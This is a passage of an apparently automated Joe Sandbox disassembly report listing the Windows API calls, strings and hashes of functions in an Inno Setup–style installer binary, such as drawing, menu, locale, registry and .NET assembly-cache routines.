                                                                                • Instruction Fuzzy Hash: EEB19270600284DFD710DF29C585B9ABBF1AF04319F14C4AAE8459B792E778EE48CF5A
                                                                                APIs
                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringWrite
                                                                                • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                • API String ID: 390214022-3304407042
                                                                                • Opcode ID: 4808755b3c6221495a972d98e090ec94bd7c13575b017f43438820c08e4f7dc1
                                                                                • Instruction ID: f7f3e57e327ad0b7fc32dd9a0c0ef844c3cf52932767352b59a94e8a2e0b7a1e
                                                                                • Opcode Fuzzy Hash: 4808755b3c6221495a972d98e090ec94bd7c13575b017f43438820c08e4f7dc1
                                                                                • Instruction Fuzzy Hash: 0E910534E001099BDB01EFA5D842BDEB7F5EF4874AF50806AE90077292D7786E49CB59
                                                                                APIs
                                                                                • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476BC5
                                                                                • 73EA59E0.USER32(00000000,000000FC,00476B20,00000000,00476E04,?,00000000,00476E2E), ref: 00476BEC
                                                                                • GetACP.KERNEL32(00000000,00476E04,?,00000000,00476E2E), ref: 00476C29
                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476C6F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ClassInfoMessageSend
                                                                                • String ID: COMBOBOX$Inno Setup: Language
                                                                                • API String ID: 1455646776-4234151509
                                                                                • Opcode ID: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                                                • Instruction ID: 76a62d5c2b18ddabed1a1f2db415f61daf58d6c828ad3828204ddc2489713d7e
                                                                                • Opcode Fuzzy Hash: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                                                • Instruction Fuzzy Hash: 4E813C346006059FC720DF69C985AEAB7F2FB09304F1580BAE849E7762D738ED41CB59
                                                                                APIs
                                                                                • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                                  • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                  • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale$DefaultSystem
                                                                                • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                • API String ID: 1044490935-665933166
                                                                                • Opcode ID: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                                                • Instruction ID: bf07bec6589cb82417a29d9109d5e68838e6a5c97ac1b9e4b464d3d1e075229e
                                                                                • Opcode Fuzzy Hash: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                                                • Instruction Fuzzy Hash: 55513E24B00108ABD701FBA69E41A9E77A9DB94304F50C07FA541BB3C7DA3DDE05975D
                                                                                APIs
                                                                                • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                                • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                                  • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                                • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                                  • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                                • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                • String ID: ,$?
                                                                                • API String ID: 2359071979-2308483597
                                                                                • Opcode ID: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                                                • Instruction ID: df95c3f439c97799bb0998fa3429798e8a176efd4e8e18b788060c5868d8049e
                                                                                • Opcode Fuzzy Hash: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                                                • Instruction Fuzzy Hash: BA51F674A00144ABDB10EF6ADC816DA7BF9AF09304B11857BF914E73A6E738DD41CB58
                                                                                APIs
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                                • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                                • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                                • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                • String ID:
                                                                                • API String ID: 1030595962-0
                                                                                • Opcode ID: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                                                • Instruction ID: 0934d86ca8fb123134a847d885dc0ae0ba41a9d0998c4bba382ea8cf266d8dc0
                                                                                • Opcode Fuzzy Hash: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                                                • Instruction Fuzzy Hash: 5A510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                                APIs
                                                                                • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                                • 73EA4620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                                • 73E98830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                                • 73E922A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                                • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                                • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                                • 73E98830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Stretch$E98830$A4620BitsE922Mode
                                                                                • String ID:
                                                                                • API String ID: 4209919087-0
                                                                                • Opcode ID: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                                                • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                                • Opcode Fuzzy Hash: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                                                • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,?,?), ref: 00457166
                                                                                  • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                  • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                  • Part of subcall function 0041EEB4: 73EA5940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                                  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571CD
                                                                                • TranslateMessage.USER32(?), ref: 004571EB
                                                                                • DispatchMessageA.USER32(?), ref: 004571F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Message$TextWindow$A5940CurrentDispatchSendThreadTranslate
                                                                                • String ID: [Paused]
                                                                                • API String ID: 1715333840-4230553315
                                                                                • Opcode ID: a723b0617cbdde8b0455b730e79db8c0792bcf361dff27c4d69091156c9f8888
                                                                                • Instruction ID: cc82e29175726c0716c689c1ffa83d11e9869aeff1ced20ba9c80888b84e3111
                                                                                • Opcode Fuzzy Hash: a723b0617cbdde8b0455b730e79db8c0792bcf361dff27c4d69091156c9f8888
                                                                                • Instruction Fuzzy Hash: 013196309082489EDB11DBB5EC81FDEBBB8DB49314F5540B7F800E7292D67C9909CB69
                                                                                APIs
                                                                                • GetCursor.USER32(00000000,0046B897), ref: 0046B814
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 0046B822
                                                                                • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B897), ref: 0046B828
                                                                                • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B832
                                                                                • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B838
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$LoadSleep
                                                                                • String ID: CheckPassword
                                                                                • API String ID: 4023313301-1302249611
                                                                                • Opcode ID: 653d9654f76fc9f2c348947714f395caa5fd1a5bea1654e8e7fe328d35dfe1b3
                                                                                • Instruction ID: aec6a0205c5a75bc54f0fc291e1a1f9730d999611bc1887dd1e74dc6007ab6bd
                                                                                • Opcode Fuzzy Hash: 653d9654f76fc9f2c348947714f395caa5fd1a5bea1654e8e7fe328d35dfe1b3
                                                                                • Instruction Fuzzy Hash: 333164346406049FD711EB69C889F9E7BE4EF49304F5580B6F844DB3A2D778AD40CB99
                                                                                APIs
                                                                                  • Part of subcall function 00477AB0: GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                                                  • Part of subcall function 00477AB0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                                                  • Part of subcall function 00477AB0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                                                • SendMessageA.USER32(00000000,0000004A,00000000,00477F42), ref: 00477BBD
                                                                                • GetTickCount.KERNEL32 ref: 00477C02
                                                                                • GetTickCount.KERNEL32 ref: 00477C0C
                                                                                • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477C61
                                                                                Strings
                                                                                • CallSpawnServer: Unexpected status: %d, xrefs: 00477C4A
                                                                                • CallSpawnServer: Unexpected response: $%x, xrefs: 00477BF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                • API String ID: 613034392-3771334282
                                                                                • Opcode ID: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                                                • Instruction ID: 65d184c56696bd8d6baefe4a5ac293f093c2dd543b1706e930bc299cdf77f89e
                                                                                • Opcode Fuzzy Hash: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                                                • Instruction Fuzzy Hash: B131A474B042149ADB11EBB988867EEB6A09F48304F90C47AF548EB392D67C9E41879D
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00459BA3
                                                                                Strings
                                                                                • CreateAssemblyCache, xrefs: 00459B9A
                                                                                • Fusion.dll, xrefs: 00459B43
                                                                                • .NET Framework CreateAssemblyCache function failed, xrefs: 00459BC6
                                                                                • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00459BAE
                                                                                • Failed to load .NET Framework DLL "%s", xrefs: 00459B88
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                • API String ID: 190572456-3990135632
                                                                                • Opcode ID: edece01ff0b44ec29f5677049ed357158d3b305d3ba0728d372a41e2f192b5a4
                                                                                • Instruction ID: 1db31b6b51e2e068c3f61674d824012408e1fbc1d182cf764eafebb5ab4ea00f
                                                                                • Opcode Fuzzy Hash: edece01ff0b44ec29f5677049ed357158d3b305d3ba0728d372a41e2f192b5a4
                                                                                • Instruction Fuzzy Hash: EF318970E00619EBDB01EFA5C88169EB7B8AF44315F50857BE814E7382D738AE09C799
                                                                                APIs
                                                                                  • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                                • GetFocus.USER32 ref: 0041C178
                                                                                • 73E9A570.USER32(?), ref: 0041C184
                                                                                • 73E98830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                                                • 73E922A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                                                • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                                • 73E98830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                                                • 73E9A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: E98830$A480A570BitsE922FocusObject
                                                                                • String ID:
                                                                                • API String ID: 2688936647-0
                                                                                • Opcode ID: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                                                • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                                                • Opcode Fuzzy Hash: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                                                • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                                • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                                • 6F9A2980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                                  • Part of subcall function 004099C0: 6F99C400.COMCTL32(0049B628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                                                • 6FA0CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                                • 6FA0C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                                • 6FA0CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                                                • 6F9A0860.COMCTL32(0049B628,00418D1F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem$A0860A2980C400C740
                                                                                • String ID:
                                                                                • API String ID: 1086221473-0
                                                                                • Opcode ID: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                                                • Instruction ID: e0b43fe86d74620756cf035266125a11838772e9d6ef4bcae2e69295d5b8951d
                                                                                • Opcode Fuzzy Hash: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                                                • Instruction Fuzzy Hash: A11149B1744204BBEB10EBA9DC83F5E73B8DB48704F6044BAB604E72D2DB799D409759
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004837A4), ref: 00483789
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                • API String ID: 47109696-2530820420
                                                                                • Opcode ID: ae1742725748cd88b87d9fe0d1248e5a5e1a514a3c9083b9a236ca5d7aa17843
                                                                                • Instruction ID: 8316402a246994b7737153b66ed252a9f16b12b2be78e08e0fa98e077eb8f510
                                                                                • Opcode Fuzzy Hash: ae1742725748cd88b87d9fe0d1248e5a5e1a514a3c9083b9a236ca5d7aa17843
                                                                                • Instruction Fuzzy Hash: 0311B1B4704244AADB10FF65CC52B5E7AE9DB41B19F60C87BA400A7282EB38CA05875C
                                                                                APIs
                                                                                • 73E9A570.USER32(00000000,?,?,00000000), ref: 00494EE9
                                                                                  • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00494F0B
                                                                                • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495489), ref: 00494F1F
                                                                                • GetTextMetricsA.GDI32(00000000,?), ref: 00494F41
                                                                                • 73E9A480.USER32(00000000,00000000,00494F6B,00494F64,?,00000000,?,?,00000000), ref: 00494F5E
                                                                                Strings
                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494F16
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                • API String ID: 1435929781-222967699
                                                                                • Opcode ID: f7d6f97b91dc48adac3cf3527b9ba73e93ee7bba49e4f60ed72cccac08d23d6d
                                                                                • Instruction ID: 6f18d4fe6cef93123b0455e30b82395b7dbfc0c8f911bccc88a8e51c4d6277b1
                                                                                • Opcode Fuzzy Hash: f7d6f97b91dc48adac3cf3527b9ba73e93ee7bba49e4f60ed72cccac08d23d6d
                                                                                • Instruction Fuzzy Hash: 95018476A04609BFEB00DBA9CC41F5EB7ECDB89704F51447AB600E7281D678AE018B28
                                                                                APIs
                                                                                • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
